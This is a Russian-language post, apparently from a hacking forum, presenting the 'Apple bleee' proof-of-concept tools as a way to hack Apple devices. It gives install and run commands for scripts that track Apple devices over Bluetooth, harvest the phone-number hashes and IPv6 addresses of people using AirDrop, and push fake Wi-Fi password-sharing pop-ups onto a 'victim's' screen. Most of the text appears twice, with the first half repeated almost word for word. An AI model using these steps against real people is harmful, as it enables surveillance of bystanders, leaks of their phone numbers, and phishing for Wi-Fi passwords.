В данном посте мы рассмотрим инструмент для взлома Apple.
Apple bleee — представляет собой экспериментальные PoC, который показывает, что злоумышленник получает от устройств Apple, если перехватывает трафик Bluetooth.
Установка
Перед началом использования инструмента вам понадобится адаптер Bluetooth для отправки BLE-сообщений и WiFi-карта, с поддержкой активного режима мониторинга.
Мониторинг Apple устройства
С помощью ble_read_state.py атакующий может отслеживать трафик и скрипт будет отображать сообщения о состоянии устройств Apple. Кроме того, инструмент обнаруживает запросы на обмен паролями с устройств Apple.
Для мониторинга введите команду без параметров:
Получаем номер мобильного телефона
Скрипт airdrop_leak.py позволяет получить номер мобильного телефона любого пользователя, который попытается отправить файл через AirDrop.
Для получения хэш номера телефона и IPv6-адрес отправителя запускаем скрипт без каких-либо параметров:
Выводим сообщение на экран жертвы
Скрипт adv_wifi.py отправляет BLE-сообщения с запросом обмена паролями через Wi-Fi. С помощью данного скрипта злоумышленник может вызвать всплывающее сообщение на целевом устройстве, зная телефон или электронную почту жертвы.
Для запроса пароля через Wi-Fi нам нужно будет указать любой контакт (электронную почту или номер телефона), который существует в контактах жертвы и SSID сети Wi-Fi, которую знает жертва:

Установка
Python:
apt update && apt upgrade -y
sudo apt-get install git
git clone https://github.com/hexway/apple_bleee.git
cd ./apple_bleee
sudo apt install -y bluez libpcap-dev libev-dev libnl-3-dev libnl-genl-3-dev libnl-route-3-dev cmake libbluetooth-dev
sudo pip3 install -r requirements.txt
git clone https://github.com/seemoo-lab/owl.git && cd ./owl && git submodule update --init && mkdir build && cd build && cmake .. && make && sudo make install && cd ../..
Перед началом использования инструмента вам понадобится адаптер Bluetooth для отправки BLE-сообщений и WiFi-карта, с поддержкой активного режима мониторинга.
Мониторинг Apple устройства
С помощью ble_read_state.py атакующий может отслеживать трафик и скрипт будет отображать сообщения о состоянии устройств Apple. Кроме того, инструмент обнаруживает запросы на обмен паролями с устройств Apple.
Python:
ble_read_state.py [-h] [-c] [-n] [-r] [-l] [-s] [-m] [-a] [-t]
Для мониторинга введите команду без параметров:
Python:
sudo python3 ble_read_state.py
Получаем номер мобильного телефона
Скрипт airdrop_leak.py позволяет получить номер мобильного телефона любого пользователя, который попытается отправить файл через AirDrop.
Python:
sudo iwconfig wlan0 mode monitor && sudo ip link set wlan0 up && sudo owl-i wlan0-N
Для получения хэш номера телефона и IPv6-адрес отправителя запускаем скрипт без каких-либо параметров:
Python:
sudo python3 airdrop_leak.py
Выводим сообщение на экран жертвы
Скрипт adv_wifi.py отправляет BLE-сообщения с запросом обмена паролями через Wi-Fi. С помощью данного скрипта злоумышленник может вызвать всплывающее сообщение на целевом устройстве, зная телефон или электронную почту жертвы.
Для запроса пароля через Wi-Fi нам нужно будет указать любой контакт (электронную почту или номер телефона), который существует в контактах жертвы и SSID сети Wi-Fi, которую знает жертва:
Python:
sudo python3 adv_wifi.py -е <электронная почта> -s <SSID точки доступа>